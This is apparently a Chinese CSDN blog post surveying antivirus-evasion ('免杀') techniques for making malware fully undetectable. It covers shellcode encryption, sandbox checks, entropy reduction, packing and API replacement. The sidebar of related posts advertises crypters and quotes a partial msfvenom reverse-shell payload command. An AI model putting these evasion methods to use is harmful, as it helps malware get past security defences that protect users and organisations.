关于免杀

最新推荐文章于 2024-06-17 17:04:32 发布
最新推荐文章于 2024-06-17 17:04:32 发布
阅读量908 收藏 6
点赞数 3
分类专栏: 安全 文章标签: 免杀 杀毒软件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012411894/article/details/103078698
版权

虽然目前有很多方法可以让恶意软件使用某一技术绕过反病毒检测,但这些显然不是恶意软件免杀的终极目标, 它们的最终目标是实现 “FUD”,
“FUD” 是地下网络论坛的黑话,代表“恶意软件完全不可被检测到”的意思。

   免杀主要有三种方法:静态免杀,动态免杀和启发式免杀。

一般杀软检测方式:

1.基于签名的检测
2.静态程序分析
3.动态程序分析
4.沙盒分析技术
5.启发式分析
6.信息熵检测

完美的免杀方法
到目前为止,要实现恶意软件的“FUD”,加密恶意代码被认为是个不错的选择,不过有几点要注意:

1.恶意程序在解密时,应当也进行代码混淆
2.当恶意文件在内存中运行解密代码时,我们必须要保证在不重定位绝对地址的情况下进行
3.恶意软件是否在沙箱环境中运行,如果是,则立马停止恶意文件的解密
4.应当只对 PE 文件中的 shellcode 或 只有二进制文件的.text部分进行加密,而不是对整个 PE 文件进行,以便把信息熵和降到最低

常用免杀方法

   ***静态免杀***
   替换特征码
   替换资源
   加花
   修改入口点
   加壳
   
   ***行为免杀***
   替换api
   未导出api
   重写api
   api+5
   底层api
   合理替换调用顺序
   绕过调用源

启发式引擎免杀注意

循环解密行为
读取运行设备名称
读取加密器的 GUID
连接随机域名
读取 Windows 安装日期
删除可执行文件
在二进制文件内存中搜索可用的IP地址
修改代理设置
在运行的进程中安装HOOKS或PATCHES
往浏览器中注入代码
注入远程进程
查询进程信息
设置过程错误模式以覆盖错误窗口
异常熵的出现
检测杀软的存在
对特定的注册表项的变动情况进行监控
包含提权的能力
修改软件的相关限制策略
读取系统/视频 BIOS 版本
PE文件头中的结束字节异常
创建受保护的内存区域
创建大量进程
企图进行长时间休眠
不常用的字节
读取 Windows产品ID
包含循环解密
包含启动或操作设备的驱动程序的能力
包含阻止用户进行干扰的能力

内存操作函数

HeapCreate和 HeapAlloc
LoadLibrary和 GetProcAddress
GetModuleHandle 和GetProcAddress

参考资料
1. 史上最全的免杀方法汇总
2.免杀技术有一套
3.免杀实战
4.Meterpreter免杀技巧

我杰尼龟怕你不成
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
国外免杀壳FuD_Jonnynho_CrypteR可过360全套
09-15
国外免杀壳FuD_Jonnynho_CrypteR可过360全套
免杀入门电子书,关于免杀方面的初级教程
07-19
免杀技术,全称为“免受杀毒软件查杀”技术,是网络安全领域中的一个重要分支,主要用于绕过安全软件的检测,使恶意代码能够避开安全防护措施,顺利执行。这门技术并非仅限于黑客或恶意攻击者使用,也常被安全研究...
关于免杀的一些介绍
安静
06-04 720
       如果你想学习免杀技术:1.基础的汇编语言 2.修改工具(不指那些傻瓜式软件).如: OllyDbg . PEditor. C32ASM . MYCCL复合特征码定位器.UE .OC. 资源编辑器等.还有一些查壳 脱壳软件(如:PEID RL脱壳机等) . 以下是常用的几种免杀方法及工具:一. 要使一个木马免杀,首先要准备一个不加壳的木马,这点非常重要,否则 免杀操作就不能进行下去
生命在于学习——免杀
易水哲的博客
10-25 2227
一些免杀的知识,没有实操。
免杀知识汇总
goddemon
09-08 6802
veil工具基础使用+进阶 ①启动方法 ①cd /opt ② ls ③veil(运行veil即可) 使用方法 如 生成go语言的免杀马 use 16 set lhost ip set lport 端口 generate#(执行即可) ②结合cs进行免杀 实操(生成go语言的免杀马) ①cs使用生成一个go语言类型的payload ②use 17 ③需要的设置变量类(具体参数设置的含义) BADMACS 设置为Y表示 查看运行环境的MAC地址如果不是虚拟机才会执行payload (反调试) CLICKT
[ShellCode] 动态解密 ShellCode,免杀
LYSM
11-27 1973
背景 今天在复习《加密与解密》时,在软件保护这一章中有一个代码与数据结合的案例,其原理是将代码段中的代码进行xor异或加密处理以后回写到原始位置,当程序运行后将此处的内容动态的进行解密,解密后回写替换回原始内存位置,这样就能实现内存加载。 由此案例我想到一个关于免杀的利用思路,首先杀软的运作方式多数为特征码查杀,当我们程序中使用了敏感的函数时,就会存在被杀的风险,而如果将代码段中的代码进行加密,需要时直接在内存中解密,那么杀软将无法捕捉硬盘文件的特征,从而可以规避杀软针对硬盘特征的查杀手法。 经过阅读该案例
免杀
include_heqile的博客
03-20 1713
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会把它干死 不过,在电脑上装了360安全卫士的情况下,defender会被抑制,我们的后门就可以正常运行了 先使用msfvenom生成shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
白加黑免杀教程,很优秀的教程
03-06
在IT安全领域,"免杀"(免于杀毒软件检测)是指使恶意软件避开安全软件检测的技术。这个"白加黑免杀教程"显然关注的是如何让恶意代码不被安全软件识别,从而提高其在目标系统上的隐蔽性和生存能力。免杀技术是黑客和...
精品免杀工具包.rar免杀
07-22
精品免杀工具包值得入手 老手、新手、都适用,可以试试,自己也在用 这个非要50字我在补点,哈哈哈额
免杀工具箱 简体中文版
02-24
免杀辅助 ┍PE+ ┝MyCCL ┝MaskPE ┝冰枫文件防火墙 ┝AVFucker ┝AV Devil ┝ToPo ┝CodeCaver ┝Anti Kaspersky ┝TK.Loader ┝INSTDRV ┝DriverLoader ┝vmprotect ┕VBExplorer 保护壳 ┍BepGui ┝Cryptor ┝...
远控免杀源码,最新教程+源码
10-21
【远程控制与免杀技术详解】 远程控制技术是IT领域中的一个重要部分,它允许用户通过网络从一个设备操控另一个设备。这种技术广泛应用于系统管理、技术支持以及恶意软件中。"远控免杀源码"指的是设计用于避开安全...
免杀简单介绍
qq_38675102的博客
01-05 2722
免杀简单介绍
APT之木马动态免杀绕过Windows Defender
Ba1_Ma0的博客
08-12 1300
APT之木马动态免杀绕过Windows Defender
免杀小结-
ZxC789456302的博客
09-26 5279
先来假设一下报毒过程,对于PE文件的检测,如果在CODE位置存在标志A,在DATA位置存在标志B,在资源位置存在标志C,同时满足这三个条件,那么杀软就会报毒,VirTest工作原理就是要找到引起报毒的最后一个标志,也就是C。最后,终极修改方法,找到访问数据的代码,直接修改代码访问数据的地址,数据也可以放到其他地址了,其实就如同修改源码一样修改,肯定没有修改源码那么容易(见后)。使用ResHacker对文件进行资源操作,找来多个正常软件,将它们的资源加入到自己软件,如图片,版本信息,对话框等。
免杀技术有一套(免杀方法大集结)(Anti-AntiVirus)
热门推荐
anhkgg的专栏
05-22 1万+
00. 概述什么是免杀?来自百科的注解: 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。 有本比较有名的书,想详细学习的同学可以去看看。《黑客免杀攻防》 其实我大概好像只看过目录…( ╯□╰ ) 下面我介绍的是自己实践的一些方法,有没有效果,试试就
别太小看“静态免杀
最新发布
白帽黑客八哥的博客
06-17 1067
免杀总体来说可分为两种,静态免杀/动态免杀。往往来说,我们更注重于在内部代码层面实现一些免杀技巧,但在有些时候,动态免杀+静态免杀以"打组合拳"的方式效果往往会更出人所料。当我们的程序生成后,杀毒软件会对整个文件做一个扫描(反编译、行为监控等)当匹配到其病毒特征库时,则会kill掉我们的程序,静态免杀则是让杀软“摸不着头脑”,匹配不到其的特征库。以下将会介绍几种方法来实现静态免杀
免杀方法(二)printspoofer
qq_56426046的博客
10-03 538
Vindows10和Windows Service20l6/2019提权工具,现在主流的提供工具之一,360安全会自动查杀,其他杀毒软件并不会查杀,往后可能更多的防护软件会对其进行拦截查杀。对其进行源码免杀,首先下载源码https://github.com/whojeff/PrintSpoofer。-———————————————————我不敢去,但必须去,有些事是必须要做的逃避不了。1.github下载源码压缩包解压,vs2019打开。用vs2019选择release x64编译。
输入表免杀方法
weixin_34148340的博客
12-26 153
输入表是PE文件结构中不可或缺的部分,输入表也称之为“导入表”。 要想了解输入表,首先还得先从DLL文件入手,dll文件也就是“动态链接库文件”,这些文件中有很多的导入函数,这些函数不会直接被执行,当一个程序 (EXE)运行时,导入函数是被程序调用执行的,其执行的代码是不在主程序(EXE)中的一小部分函数,其真正的代码却在DLL文件中。在PE文件映射到 内存后,window...
免杀对抗-C2远控篇&C&C++&SC转换格式&UUID标识&MAC物理&IPV4地址&减少熵值(1)
m0_60634927的博客
04-09 810
if (!printf(“[!ptr += 6;
python 免杀
09-11
Python免杀是指在编写Python恶意代码时,通过一系列技术手段绕过杀毒软件的检测和阻止。在进行Python免杀时,可以采取多种常用的静态免杀技术,如特征码定位修改、填充花指令、文件加壳、内存执行、shellcode混淆、shellcode和loader分离、木马资源修改和调用系统白名单等。这些技术可以帮助我们在编写Python恶意代码时避免被杀毒软件检测到。 其中,特征码定位修改是指通过修改代码中的特征码或者特征码的位置,使得杀毒软件无法识别恶意代码。填充花指令是在代码中插入一些无实际功能的指令,以混淆代码结构,增加杀毒软件的分析难度。文件加壳是将恶意代码嵌入到其他可信的文件中,以绕过杀毒软件的检测。内存执行是将恶意代码直接加载到内存中执行,避免了被杀毒软件静态检测的可能。shellcode混淆是通过对shellcode进行变形或加密,使其难以被杀毒软件识别。shellcode和loader分离是将shellcode和加载器分离,使得杀毒软件难以检测到完整的恶意代码。木马资源修改是通过修改恶意代码所依赖的资源文件或者库文件,绕过杀毒软件的检测。调用系统白名单是指利用操作系统的合法功能或者系统自带的程序来执行恶意代码,使其被认为是正常行为而不被杀毒软件拦截。 需要注意的是,不同语言的shellcode和loader在免杀效果上有所差异,而Python在免杀中的效果相对较好。此外,选择小众语言和不同的exe打包器也可以提高免杀效果。同时,在编写Python恶意代码时,尽量避免使用敏感词汇,以降低被杀毒软件查杀的概率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值